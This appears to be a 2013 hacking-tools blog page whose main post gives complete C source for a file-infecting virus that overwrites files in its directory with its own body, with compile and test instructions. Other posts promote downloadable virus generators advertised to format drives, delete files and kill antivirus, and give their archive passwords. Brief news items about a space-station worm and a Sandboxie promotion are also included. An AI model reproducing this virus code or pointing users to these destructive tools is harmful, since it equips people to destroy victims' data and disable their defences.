Free Hacking Tools: VIRUS

Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Monday, 4 March 2013

Facebook Virus

,
The leading social networking site was struck by a redirecting virus..and i beleive we soon will be seeig soon similar stuff on Orkut.
This virus is known as redirect virus. It sends ur frnds a link and sends them to some page the hacker wants to.
see it here...
don't worry ..Surely not redirect virus link... ha ha

Thursday, 28 February 2013

Creating a virus : Tutorial

,
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 


#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

Wednesday, 27 February 2013

Computer virus in space - NASA astronauts get hit

,
This will be shown only in post's page.
(DPA) Scientists from the National Aeronautics and Space Administration (NASA) were busy fighting a computer virus that managed to infect one of the laptop computers used by astronauts on the space station, a spokesman for the US space agency said.

Citing security concerns, NASA Wednesday declined to identify the virus, or how it made its way to the space station.

But the space news site SpaceRef.com, which first reported the infection, identified the virus as 'W32.Gammima.AG'. Referring to NASA's daily status reports, the site said the virus was probably transmitted on a flash disk drive which somehow had not been scanned.

The malware is a year-old Windows worm designed to steal information from players of 10 different online games, some of them specific to the Chinese market. Among the games are ZhengTu, HuangYi Online and Rohan.

NASA said that new anti-virus programmes had been installed on the station's computers and that the worm posed no threat. 'It was never a threat to any command-and-control or operations computer,' NASA spokesman Kelly Humphries told Computerworld magazine.

Source:- http://in.news.yahoo.com/

Saturday, 23 February 2013

DELmE's BATCH VIRUS GENERATOR

,
type='html'>


DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more. 

Download here:  

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html 

Password: hackingguide

Thursday, 21 February 2013

THE ULTIMATE VIRUS PROTECTION : SANDBOXIE

,
type='html'>


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.



The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once. 

Download here:  

http://www.ziddu.com/download/6977841/SandboxieInstall.rar.html 

Password: hackingguide

SONIC BAT - THE BATCH FILE VIRUS CREATOR

,
type='html'>


This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

VIRUS CREATOR

,
type='html'>


This Virus Creator is a simple one as it gives few options to infect victim's computer like format system drive, corrupt system files etc. 

Download here:  

http://www.ziddu.com/download/6953378/VirusCreatorV.65.rar.html 


Password: hackingguide
 

Free Hacking Tools Copyright © 2011 -- Template created by All Premium Accounts -- Powered by Free Premium Accounts